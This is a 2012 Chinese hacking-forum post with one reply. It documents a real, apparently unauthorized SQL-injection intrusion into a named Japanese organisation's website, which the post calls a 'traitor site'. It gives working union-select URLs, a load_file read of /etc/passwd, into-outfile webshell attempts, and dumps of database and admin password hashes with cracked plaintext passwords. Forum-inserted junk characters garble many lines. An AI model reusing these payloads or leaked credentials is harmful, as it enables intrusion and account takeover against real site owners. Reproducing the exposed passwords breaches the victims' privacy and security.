找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3126|回复: 1
打印 上一主题 下一主题

原创 检测汉奸站全过程

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-17 16:22:02 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
补:www.zuaa.jp测试
8 L) w  `& J+ D! s; ]4 E
( O3 V' f* Q8 B3 p8 s' x& M$ O
0x01. 检测 www.zuaa.jp 收集数据
6 e" K4 [# d! j
+ h; C, K- L. c- b0 [- ~/ C# J; s6 S& N+ s; c
whatweb
+ z: c- g4 B: U# J; C* [. |( x! G/ r! b3 j# j- R3 m

' H1 f- }& C- a4 }8 Y$ f利用NMAP扫描
& S9 N2 F2 S/ C
- N* s8 z- D9 S0 _( m中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持& K3 s4 _" Z" B* k2 N- O* m
0x02.找注入点4 C% p. A9 l+ a8 Y9 }
找注入点:http://www.zuaa.jp/php/newsdetail.php?topic_id=3906 ]' ~4 L( X( m% N& X4 `) m2 p

1 M% Q( b3 n/ }& {$ }) N
, N1 c, f% g  m0x03.order by
% h! w( @9 U# w8 ]2 f. I             http://www.zuaa.jp/php/newsdetail.php?topic_id=390 order by 1
* f0 v& U7 V/ G  t; {
. U: c4 C+ R3 a" K' }6 ?order by 28报错,order by 27正常
' S4 l: G6 j, }, r/ o, t% t0 c) B! s
0x04.   union手动查询
7 n  s/ h- R& q4 T9 vhttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27 * [1 A3 X3 p  ]
添加到 27 时正常显示 / ?" ?2 q7 A. Q: a

+ I: U8 ]) }: \# a0 ^: [, `+ X- c: z中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
+ D  G5 y& E' |* J+ \+ w5 I/ d. ~4 x2 T- M0 k" j+ k
0x05. info:" R- c0 l& W9 }$ B/ y4 z, |: k4 s  N
http://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,group_concat(user(),0x3a,database(),0x3a,version(),0x3a,@@version_conpile_os),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
+ S3 e3 }$ k# m6 @5 {6 ]. M8 p3 b+ A% S+ Z
user:            root@localhost4 ]: S+ h# L  P3 I4 L
database:    openpne+ j" i! U; q7 u4 g* r: Y* ^; B
version:      4.1.22* z% u! ~4 f  |% \7 B
os:             portbld-freebsd5.4& V- D2 W. O4 K8 f: [

: P* m$ j! H) e5 W  d/ {; d" {* X0x06. root用户
. |  f8 v. S3 r( Z' y2 F利用 load_file(0x...), 读文件 (/etc/passwd), 也可以这样 hex(load_file(0x.....)), 然后把得到的 hex ,再转换成字符的(这种方法, 可以过大多数站)
% |8 t* e  a* Q1 ohttp://www.zuaa.jp/php/newsdetail.php?topic_id=198%20and%201=2%20union%20select%201,2,hex(load_file(0x2f6574632f706173737764)),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27
, o% x; \$ O: O' @' f, N% `  X4 {# n& ]! B# a
通过工具转换. p: t1 e- |( h2 K. y4 a) S
  T; a' C& ~5 W
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持2 m: |+ ^0 p5 K: m! b% F

8 ~) l: {4 q8 a( s& t0x07. 利用 into outfile; o9 p4 G7 w+ Q0 b5 e' p( N  ^
全部都失败
5 J9 Z7 \4 |/ B, j2 @7 Yhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/zuaa_tech/WEBSITE/htdocs/php/help.php
- k% D% l1 i! K
5 H1 R, k; \: Y! d! k/ m; k) Bhttp://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,0x31,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+into+outfile+'/usr/home/qian/OpenPNE/lib/help.php
% v* k/ a0 r/ c7 b" C* P% B/ ~; \: [0 P/ j2 n
页面显示“MDB2 Error:syntax error”4 R7 n* R: \$ {8 ?# d8 ~, L

; v6 Q% l& o) [7 u0 k: N& u6 f0x08. 利用 mysql 4.12 |* t2 M+ U# A
猜常规表名,字段未果 工具 sqlmap8 i/ R; f, _4 t
中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
9 B8 e# L' G7 u4 Q9 j& J/ F- i2 o+ B. M# G5 R8 v$ n

/ c! J7 _* _2 L8 G/ A2 F9 V# l, D! c- X+ C
0x09. 查找后台
  R; _$ W  R( y- H利用 现有的各种 后台工具尝试都不行
7 u* r" M$ q( }( l$ n7 f/ o0 ^0 y4 u5 l
0x10.  MySL外联方法9 S8 K5 S- |; }% ~7 F
从前面 nmap 收集的信息当中,可以看到开了 mysql 3306 端口 ,尝试得 mysql 用户各密码,然后再通过 mysql 工具外连 www.zuaa.jp 不行
1 F7 `- i  c, f3 d" r8 e可以利用 mysql ( 4.x 5.) 自带的定义表 mysql.user( i/ c0 k( t: u7 J9 l  A3 f
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(user,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+mysql.user
# L! p: K1 k4 d7 u3 K  `+ H! M* @4 P: c# _
这个可以在 www.cmd5.com 解密
( Q6 }$ ]- l- L7 ?; Xroot:*3711D518F2924AEFA6F4C6B4B7425CAE8BEB88AB zuaa2009" T3 G8 a  G$ @  X+ u
chen:*2A09A939E6B654877DD70B00EA631D1007E58CC9 silkroad97
0 T: n0 t+ o# M# I/ \. }. ]+ p% N$ _; Kopenpne:*5D80C62EC4D258534F 07D08CCE9CE27DFF26A366 ???6 j+ H4 s0 K# U- ?8 M
zuaa:*5D80C62EC4D258534F07D08CCE9CE27DFF26A366 ???5 X0 w) m5 h+ X+ S0 v3 ?9 p- z8 F
工具外连失败,据说防火墙策略只允许特定IP外连,具体不得知( \$ P. D; O) |2 D

6 @: k& i5 h- R, h4 S. C
, B+ }. E/ y9 g4 I3 i0x11. 网站突破
4 T, L/ ?( R4 |8 V* Q发现网站的源程序 openpne, google 下载 openpne 源码5 _; C. @( U( o2 F: f5 Y+ l

- ?- A$ S- U* |# y4 m
- [6 B/ e5 a+ R& u( U' O0x12. 默认信息利用
1 }' g% X" W8 F/ j# _5 whttp://sns.zuaa.jp/?m=admin&a=page_login$ P3 @$ R- r1 A, _0 a

$ H( `2 B4 R3 v. i* U) E表名 (c_admin_user) ,字段名(username,password)0 d: h1 c2 `1 C5 X5 ~3 Q
http://www.zuaa.jp/php/newsdetail.php?topic_id=-390+UNION+SELECT+1,2,group_concat(username,0x3a,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+c_admin_user  @5 q/ M3 R- C7 f' ]/ l
5 E" Y, O3 J# |- z+ ]3 W! Z6 A
解密8 g( s7 `$ i) }. H4 v4 d3 Q: x6 l" }2 Y
zuaa_tech:dd041e2 b1b8ecee164a6cb196a496eda,               zuaa2009! n& d1 X- ]( J+ X; [1 I
zuaajp:c0923ec5857796a393da99905008c176,          zju1897
9 D- p  Z/ y  F) w0 q' h/ k
& {* L7 t, P. `8 A/ a$ y中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持" n5 d6 Z! S; G5 }- u

( V# B4 n0 B2 z' ~3 a0x13. 登录后台
& q! K- ^$ r$ w  t" j& w$ k0 h1 ~# I" q; l' w, z* r

: B) z0 _0 K7 o! `& D. j9 {8 _- U  K/ z( {. C
0x14. 小结
/ F6 z7 @% }' a2 P, k/ f, Z利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 利用网站相关信息,进行突破 。
- ^9 Y% ]) M; V; t感谢群 ---- 渗透 -酷帅王子 提供注入点 提供注入点# r6 s: a' _3 V: K9 B
------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- ------------------------------------------------------- -------------------------------------------------------By DarkRain
$ _& V7 x# F# D4 v: L$ j中国网络渗透测评联盟http://www.political-security.com/ 提供技术支持
# d6 T1 T. m# M& ^! {/ d3 }  b# d; {3 X4 \# J
最后声明:本人只负责了整理上传到论坛,让大家学习,不是原作者,原作者辛苦了!) H9 |" A. @) _- K& Z

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
回复

使用道具 举报

沙发
发表于 2012-9-19 08:27:03 | 只看该作者
哪个牛人 费的这劲 入侵的
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表